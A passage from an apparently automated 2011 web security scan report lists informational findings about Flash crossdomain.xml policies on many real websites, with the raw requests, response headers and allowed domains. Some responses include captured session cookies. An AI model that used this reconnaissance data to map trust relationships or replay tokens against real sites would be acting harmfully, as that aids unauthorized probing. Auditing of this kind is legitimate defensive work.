...[SNIP]...

7.526. http://www.michaels.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michaels.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.michaels.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:19 GMT
Server: Demandware eCommerce Server
Content-Length: 288
Cache-Control: public;max-age=55864
Expires: Sun, 03 Apr 2011 05:11:23 GMT
Last-Modified: Thu, 31 Mar 2011 21:49:51 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="michaels.liquifire.com" />
...[SNIP]...

7.527. http://www.mlive.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mlive.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 166
Content-Type: text/xml
ETag: "3bb77-a6-4867f740fbe40"
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:00:26 GMT
Date: Sat, 02 Apr 2011 14:00:25 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="businessfinder.mlive.com"/>
<site-control permitted-cross-domain-policies="all" />
</cross-domain-policy>


7.528. http://www.motime.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motime.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:57:01 GMT
Content-Type: text/xml
Content-Length: 415
Last-Modified: Mon, 08 Mar 2010 16:30:37 GMT
Connection: close
Set-Cookie: trkdada=x3UsLk2XKy1RQzT1A0HJAg==; expires=Sun, 01-Apr-12 13:57:01 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="img.dada.net" to-ports="*"/>
   <allow-access-from domain="s.motime.com" to-ports="*"/>
   <allow-access-from domain="s.play.me" to-ports="*"/>
   <allow-access-from domain="new.playme.com" to-ports="*"/>
   <allow-access-from domain="img.playme.com" to-ports="*"/>
...[SNIP]...

7.529. http://www.movietickets.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.movietickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.movietickets.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 11 Dec 2007 22:58:11 GMT
Accept-Ranges: bytes
ETag: "8d40b84d493cc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:32 GMT
Connection: close
Content-Length: 220

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="movietickets.com" />
</
...[SNIP]...

7.530. http://www.orbitz.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:17:11 GMT
ETag: "2b8-49f8e1d3493c0"
Content-Type: text/xml
Content-Length: 696
Server: Apache
Date: Sat, 02 Apr 2011 13:33:54 GMT
Age: 7467
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

<cross-domain-policy>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="submit.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="mx.pointroll.com"/>
   <allow-access-from domain="geo.pointroll.com"/>
   <allow-access-from domain="ll.pointroll.com"/>
   <allow-access-from domain="clk.pointroll.com"/>
   <allow-access-from domain="clients.pointroll.com"/>
   <allow-access-from domain="fdaf.pointroll.com"/>
   <allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

7.531. http://www.panoramio.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.panoramio.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.panoramio.com

Response

HTTP/1.0 200 OK
Expires: Sat, 02 Apr 2011 17:55:24 GMT
Content-Type: text/x-cross-domain-policy
Date: Fri, 01 Apr 2011 17:55:24 GMT
Server: Google Frontend
Cache-Control: public, max-age=86400
Age: 70936

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="www.porsche.com" />
<allow-access-from domain="flash.porsche.com" />
<allow-access-from domain="gmaps-samples-flash.googlecode.com" />
...[SNIP]...

7.532. http://www.phoenix.edu/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phoenix.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.phoenix.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:56 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 639
Last-Modified: Fri, 29 Jan 2010 00:33:04 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="phoenix.edu" />
...[SNIP]...
<allow-access-from domain="beta.phoenix.edu" />
   <allow-access-from domain="iamaphoenix.phoenix.edu" />
   <allow-access-from domain="cdn-static.phoenix.edu" />
   <allow-access-from domain="rfi.phoenix.edu" />
   <allow-access-from domain="ws.aptimus.com" />
   <allow-access-from domain="network.aptimus.com" />
...[SNIP]...

7.533. http://www.playdom.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playdom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playdom.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:41:53 GMT
Content-Type: application/xml
Connection: close
ETag: W/"219-1296759480000"
Last-Modified: Thu, 03 Feb 2011 18:58:00 GMT
Content-Length: 219

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cdn0.mobwarsapp.com" />
</cr
...[SNIP]...

7.534. http://www.regions.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402696235; path=/
Content-Length: 1000
Content-Type: text/xml
Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT
Accept-Ranges: bytes
ETag: "3b38bf3ea0b4ca1:83cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:33 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.luckie.net" />
<allow-access-from domain="luckie.net" />
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="fdaf.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

7.535. http://www.rr.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rr.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:54 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 21:29:25 GMT
ETag: "1b67-760-6a5b1740"
Accept-Ranges: bytes
Content-Length: 1888
Keep-Alive: timeout=3, max=384
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.rr.com" secure="false
...[SNIP]...
<allow-access-from domain="quantum.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="hercules.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="broker.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="content.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cmarsh.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.life.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="img.timeinc.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="img3.timeinc.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="npaci.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="mmink.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="smadden.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="emitchell.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa06.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult06.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult07.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult08.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult09.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="kpisz.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="lmansfield.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tconley.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tnguyen.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="img3.allyou.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="video.rr.com" secure="false"/>
...[SNIP]...

7.536. http://www.sacbee.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 20 Sep 2007 14:43:32 GMT
ETag: "15a42fa-1b6-46f28714"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:40:45 GMT
Content-Length: 438
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.sacbee.com"/>
<allow-access-from domain="media.sacbee.com"/>
<allow-access-from domain="data.sacbee.com"/>
<allow-access-from domain="dwb.sacbee.com"/>
<allow-access-from domain="sports.sacbee.com"/>
<allow-access-from domain="preview.sacbee.com"/>
<allow-access-from domain="sacbee.com"/>
<allow-access-from domain="newsroom-static.mcclatchyinteractive.com" />
...[SNIP]...

7.537. http://www.sharebuilder.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sharebuilder.com

Response

HTTP/1.1 200 OK
Content-Length: 228
Content-Type: text/xml
Content-Location: http://www.sharebuilder.com/crossdomain.xml
Last-Modified: Tue, 08 Mar 2011 23:22:08 GMT
Accept-Ranges: bytes
ETag: "050aaa4e7ddcb1:6af"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=9DCFD617433D593E5722499674DAD3B6; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=9DCFD617433D593E5722499674DAD3B6; Path=/; Domain=.sharebuilder.com
HostName: A103
Date: Sat, 02 Apr 2011 13:43:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="content.sharebuilder.com" />
...[SNIP]...

7.538. http://www.stltoday.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stltoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stltoday.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2012780
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 02 Apr 2011 13:40:27 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.7
X-TNCMS-Render-Time: 0.0227
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: stltoday.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.newyork1.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.539. http://www.stlyrics.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stlyrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stlyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:34 GMT
Server: Apache/2.0.55
Last-Modified: Wed, 28 May 2008 05:00:00 GMT
ETag: "e0037-61-48eb5400"
Accept-Ranges: bytes
Content-Length: 97
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="lyrics.stlyrics.com" />
</cross-domain-policy>

7.540. http://www.talkingpointsmemo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkingpointsmemo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.talkingpointsmemo.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:51:51 GMT
Keep-Alive: timeout=10, max=981
Accept-Ranges: bytes
ETag: "f2c002-174-4764d0fc57200"
Connection: close
Last-Modified: Mon, 19 Oct 2009 17:27:36 GMT
Content-Length: 372

<cross-domain-policy>
<allow-access-from domain="www.rockthatproject.com"/>
<allow-access-from domain="rockthatproject.com"/>
<allow-access-from domain="ec2-67-202-52-64.compute-1.amazonaws.com"/>
<al
...[SNIP]...
<allow-access-from domain="talkingpointsmemo.com"/>
<allow-access-from domain="michiko23.com"/>
...[SNIP]...

7.541. http://www.tamu.edu/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tamu.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tamu.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:47 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Wed, 15 Dec 2010 14:47:16 GMT
ETag: "23-101-4977403682500"
Accept-Ranges: bytes
Content-Length: 257
Keep-Alive: timeout=15, max=55
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.tamu.edu" />
<allow-access-from domain="tamu.edu" />
...[SNIP]...

7.542. http://www.thisis50.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisis50.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thisis50.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:20 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=26f85903-1e9a-45e2-9746-20ff67741dc8;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:20 GMT
Set-Cookie: ning_session=4w28PxsoeUA6/T0n/MTopmnkbxuwlNL/BUCzkXTQGFgXLNhzOvppdenwA2oaNYNBu95PCqf4kTA=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:20 GMT
X-XN-Trace-Token: 5dc22b78-4420-49e1-b416-00be1445c046
ETag: "7d09c-160-49d5e5d247680"
Date: Sat, 02 Apr 2011 13:40:40 GMT
Date: Sat, 02 Apr 2011 13:40:40 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Expires: Fri, 02 Apr 2021 01:40:40 GMT
Last-Modified: Mon, 28 Feb 2011 21:28:42 GMT
CACHE-CONTROL: max-age=315576000
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: application/xml
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="static.ning.com"/>
<allow-access-from domain="c2.static.ning.com"/>
<allow-access-from domain="static.xna.ningops.net"/>
<allow-access-from domain="c2.static.xna.ningops.net"/>
...[SNIP]...

7.543. http://www.thomasnet.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thomasnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:01 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
Last-Modified: Fri, 07 Sep 2007 14:01:38 GMT
ETag: "1856d0-1bc-13d87480"
Accept-Ranges: bytes
Content-Length: 444
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="www.whyabe.com" /><allow-access-from domain="whyabe.com" /><allow-access-from domain="realtimerfp.com" /><allow-access-from domain="www.realtimerfp.com" /><allow-access-from domain="sourceoneinc.com" /><allow-access-from domain="www.sourceoneinc.com" />
...[SNIP]...

7.544. http://www.tradekey.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tradekey.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:11 GMT
Server: Apache
Last-Modified: Sat, 04 Sep 2010 06:41:24 GMT
Accept-Ranges: bytes
Content-Length: 737
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="img.tradekey.com" />
<allow-access-from domain="img1.tradekey.com" />
<allow-access-from domain="img2.tradekey.com" />
<allow-access-from domain="www1.tradekey.com" />
<allow-access-from domain="ar.tradekey.com" />
<allow-access-from domain="cn.tradekey.com" />
<allow-access-from domain="es.tradekey.com" />
<allow-access-from domain="jp.tradekey.com" />
<allow-access-from domain="china.tradekey.com" />
<allow-access-from domain="int1.tkcdn.com" />
<allow-access-from domain="int2.tkcdn.com" />
...[SNIP]...

7.545. http://www.umich.edu/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.umich.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.umich.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:44 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 22:50:37 GMT
ETag: "123f68-14d-49b7cb5e86940"
Accept-Ranges: bytes
Content-Length: 333
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="president.umich.edu" />
...[SNIP]...
<allow-access-from domain="umich.edu" />
...[SNIP]...

7.546. http://www.verisign.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:35 GMT
Server: Apache
Set-Cookie: v1st=7CAA616EF17DECD4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
ETag: "28e9339-d5-49a38fa7a2e80"
Accept-Ranges: bytes
Content-Length: 213
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

7.547. http://www.vimeo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vimeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:22 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 20:28:47 GMT
ETag: "749ee-15f-e842fdc0"
Accept-Ranges: bytes
Content-Length: 351
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 13:23:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="none"/>
...[SNIP]...

7.548. http://www.vistaprint.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vistaprint.com

Response

HTTP/1.0 200 OK
Content-Length: 92
Content-Type: text/xml
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=409EF4DB2236D7BA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

<cross-domain-policy><allow-access-from domain="apps.ezprints.com"/></cross-domain-policy>

7.549. http://www.walgreens.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walgreens.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walgreens.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 06 Aug 2009 18:25:09 GMT
Accept-Ranges: bytes
Content-Length: 259
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:00 GMT
Connection: close
Set-Cookie: akaau=1301751960~id=08f4223290173c8e1d54c33f982c09f3; path=/

<cross-domain-policy>
   <allow-access-from domain="img.walgreens.com"/>
   <allow-access-from domain="images.walgreens.com"/>
   <allow-access-from domain="dnbdap01.walgreens.com"/>
   <allow-access-from domain="mymachine.walgreens.com"/>
...[SNIP]...

7.550. http://www.xe.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

